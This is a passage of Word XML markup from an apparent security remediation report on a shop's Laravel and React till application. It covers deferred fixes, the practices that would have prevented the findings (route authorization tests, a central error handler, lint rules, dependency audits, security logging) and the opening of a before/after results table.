    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DD">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Why not:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> it needs a secret store, enrolment UI, recovery codes and a lockout-recovery procedure for a shop with no IT desk a feature in its own right, beyond these assignments timebox. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Partially mitigated:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> an administrator signing in with Google is protected by that account's 2FA, so the OIDC work delivers most of the benefit for the strongest login path.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="446" w:hanging="221"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NF-4 · Supply-chain surface reduction.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The frontend ships </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">two complete UI kits</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (shadcn/Radix </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ant Design), two toast libraries, and a non-standard rolldown-vite build channel that will not receive the same security backports as stable Vite.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DF">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16" w:hanging="10"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Why not:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> removing a UI library means touching every page that imports from it, and a visual regression pass across 24 pages that we cannot properly test without the shop's own data. The dependency count is a real risk; breaking the till is a certain one. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigated:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> all 23 advisories cleared, and npm audit now gates CI.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="446" w:hanging="221"/>
        <w:rPr>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NF-5 · Rotating leaked values and rewriting history.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The production and staging hostnames remain in the frontend's git history, and the live document root still points at the project directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E1">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16" w:hanging="10"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Why not:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> rewriting history with git filter-repo changes every commit hash and breaks every existing clone and it would also destroy the before/after history this assignment is graded on. The complete remediation is to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rotate</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the hostnames and move the document root, both of which need DNS and hosting-panel access the team does not control.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E2">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16" w:hanging="10"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigated:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> .htaccess hardened to deny dotfiles, source directories and logs; .gitignore fixed; CI now fails on any tracked .env ; a runbook is included for the operator.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="446" w:hanging="221"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NF-6 · ~126 pre-existing lint errors.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Almost all no-unused-vars .</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E4">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Why not:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> none are security defects, and clearing them would touch dozens of files this remediation has no other reason to change  burying the security diff and making it unreviewable. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigated:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the security rules got their own config and their own CI gate ( lint:security ), which passes clean. The cleanup can be scheduled on its own merits.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="80" w:before="280" w:lineRule="auto"/>
        <w:ind w:left="24" w:hanging="1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 Practices that would have prevented these</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E6">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most useful question is not "what was wrong" but "what would have caught it". Several findings point at the same few gaps.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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Authorization asserted by tests, not by intention.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E8">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V-02 is the sharpest lesson in this report: the control was designed, implemented and registered, then not connected and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nothing noticed for months</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. No scanner catches this, because a scanner cannot know which routes ought to be privileged. A single test per privileged route ( assert an employee gets 403 ) would have failed on day one. We wrote 22 such tests; they are cheap and they are the only thing that makes "who can call this?" a question with an enforced answer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="221" w:hanging="221"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure defaults over remembered discipline.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EA">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V-04 recurred in five controllers because $request-&gt;all() is easier to type than $request-&gt;validated() . V-03 recurred in thirteen places because a plain find($id) is the obvious thing to write. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EB">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fix in both cases was to make the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wrong</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> thing impossible rather than merely discouraged: business keys removed from $fillable so mass assignment cannot reach them; -&gt;visibleTo() as the idiom with unscoped queries visible by their absence.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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Lint rules where the framework's protection ends.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ED">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V-13 happened because the team's mental model  "React escapes for us"  was correct for 23 of 24 pages and wrong for the one building HTML by hand. A rule banning document.write and innerHTML would have flagged it the day it was written. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the rule must be tested: our first attempt used the obvious no-restricted-properties form, which silently matched none of the seven real call sites because they are all printWindow.document.write .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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Dependency scanning in CI from day one.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EF">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V-12's 41 advisories did not appear overnight; they accumulated while nobody was looking.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F0">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Composer audit and npm audit take seconds and would have surfaced Laravel 10's end of life the week it happened, when upgrading was a small job rather than a forced one.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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Make the insecure default impossible to commit.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F2">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V-14's root cause was not a careless commit it was that.gitignore had no .env rule, so nothing prevented it and nothing warned. Our CI asserts </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the rule exists</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, not just that the file is currently absent. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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One error contract, defined once.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F4">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V-07 leaked SQL from ten call sites while GrnController gated the same thing correctly. Per-controller error handling means every controller is an opportunity to get it wrong. A single Handler::render() means an individual controller </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cannot</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1F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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Threat-model the client boundary explicitly.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F6">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V-10 and V-16 are the same mistake at two layers: treating the SPA as part of the system rather than as an untrusted client. Asking "what if this request did not come from our UI?" of each endpoint would have caught both.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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Log security events before you need them.</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F8">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V-11 meant the 20-attempt password spray in V-05b left no trace at all, and invoice cancellation actively erased its own evidence. Logging is cheap before an incident and impossible afterwards.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="222" w:right="16" w:hanging="208"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reproducible provisioning as a security control.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FA">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="222" w:right="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Three defects (§5) meant the application could not be installed from source. An operator whose only option is to hand-patch the schema </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">will</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> diverge from the intended configuration which is how misconfiguration starts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="80" w:before="280" w:lineRule="auto"/>
        <w:ind w:left="24" w:hanging="1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 Results</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table8"/>
        <w:tblW w:w="10194.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="38.0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0400"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2878"/>
        <w:gridCol w:w="4366"/>
        <w:gridCol w:w="2950"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2878"/>
            <w:gridCol w:w="4366"/>
            <w:gridCol w:w="2950"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="424"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FC">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Measure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FD">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:lef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Before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FE">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="4"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After</w:t>
            </w:r>
